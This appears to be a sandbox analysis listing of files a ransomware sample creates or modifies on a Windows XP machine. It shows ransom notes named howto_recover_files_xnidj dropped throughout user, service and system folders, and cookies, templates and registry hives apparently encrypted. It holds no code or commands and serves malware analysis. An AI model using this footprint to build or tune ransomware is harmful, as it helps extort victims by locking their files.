    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Wireshark\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Templates\winword.doc (426 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Wireshark\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (1280 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\glob.settings.js (860 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\WinPcap\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
    C:\RECYCLER\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\UserData\YJM90VAL\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@c.bing[2].txt (988 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Cookies\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\2Z89WTQV\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\3\howto_recover_files_xnidj.html (6 bytes)
    C:\totalcmd\KEYBOARD.TXT (436 bytes)
    %Documents and Settings%\%current user%\Templates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@ox.sadpanda[2].txt (1052 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Install\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\9.0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\MMC\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Recent\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg (1225 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\kiks.yandex.ru\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\52\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (1052 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\00064D96\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (1084 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (1020 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\excel4.xls (419 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\howto_recover_files_xnidj.txt (2 bytes)
    C:\RECYCLER\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\System Tools\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\My Documents\My Pictures\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Music\My Playlists\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\57\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\19\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@youtube[2].txt (1344 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (1052 bytes)
    %Documents and Settings%\Default User\PrintHood\howto_recover_files_xnidj.txt (2 bytes)
    C:\totalcmd\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Templates\powerpnt.ppt (454 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Cookies\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Cookies\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Music\My Playlists\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\UserData\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\SendTo\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT (8900 bytes)
    %Documents and Settings%\All Users\Favorites\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sadpanda[1].txt (1020 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (1446 bytes)
    %Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\My Documents\My Pictures\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\DRM\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Favorites\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\NetHood\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\SendTo\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\AU\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (1020 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\My Documents\recover_file_gtdrleovk.txt (249 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (1440 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\AU\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Music\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Favorites\Links\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\UserData\4XCFALMJ\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (1020 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Favorites\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\howto_recover_files_xnidj.html (6 bytes)
    C:\totalcmd\SIZE!.TXT (1606 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Cookies\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\UserData\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\PrintHood\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\howto_recover_files_xnidj.txt (2 bytes)
